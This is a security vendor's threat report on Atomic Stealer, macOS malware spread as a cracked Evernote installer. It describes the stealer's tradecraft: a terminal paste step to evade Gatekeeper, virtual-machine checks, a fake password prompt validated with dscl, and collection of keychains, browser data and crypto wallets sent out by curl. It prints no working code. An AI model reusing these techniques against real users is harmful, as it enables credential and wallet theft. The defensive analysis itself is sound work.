Atomic Stealer Malware Disguised as Crack Program (macOS)
AhnLab SEcurity intelligence Center (ASEC) has discovered the Atomic Stealer malware being distributed disguised as the Evernote Crack program. Atomic Stealer is an information-stealing malware for macOS. It steals data such as browser information, system keychain, wallet, and system information. It is mainly distributed through installation files such as pkg and dmg.
When users access the site that distributes malware, a screen prompting the download of a crack installation file is displayed. The site checks the browser UserAgent of the victim’s system environment. If the UserAgent is for macOS, the user is redirected to the Atomic Stealer installation page. If the UserAgent is for Windows, the user is redirected to the LummaC2 malware installation page.
Figure 1. Malware distribution site
In the case of the macOS environment, threat actors prompt users to execute the commands on the page in their terminal before distributing the malware through the installer. The executed shell script downloads and executes Atomic Stealer. This method is likely used to bypass the GateKeeper pop-up that appears when an externally downloaded file is executed.
Figure 2. install.sh installing malware
Additionally, when the file packaged in dmg format is executed, it prompts users to open the Installer file and click the Open button to run the malware.
Figure 3. Screen after executing the dmg file
Atomic Stealer collects system information using the “system_profiler” and “SPMemoryDataType” commands, then checks for the “QEMU” or “VMware” string in the metadata to prevent file execution in a virtual environment.
Figure 4. Logic for checking the virtual environment
Atomic Stealer displays a warning message disguised as a legitimate program and requests the system password. When the user enters the password, it uses the “dscl . authonly” command to validate and store the entered password.
Figure 5. Collecting the password
Figure 6. Warning window prompting for the system password
As shown in Figure 5, Atomic Stealer executes AppleScript via OSA Script to explore and collect files that are the target of information leakage. Ultimately, it creates a subdirectory in the “/tmp” path and collects the information of browsers, systems, Notes, keychains, Telegram, and cryptocurrency wallets. It then compresses the collected data into a file named “out.zip” using the “ditto” command. The compressed user information is sent to the threat actor’s server via a POST request using the “curl” command and then self-deletes.
Figure 7. Information being leaked to the C2 server
Atomic Stealer, as mentioned above, is disguised as a crack and distributed, or users are redirected to a website that hosts the malware through the Google ad platform. Thus, users must be cautious of using programs downloaded from unknown sources and use official software distribution websites.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
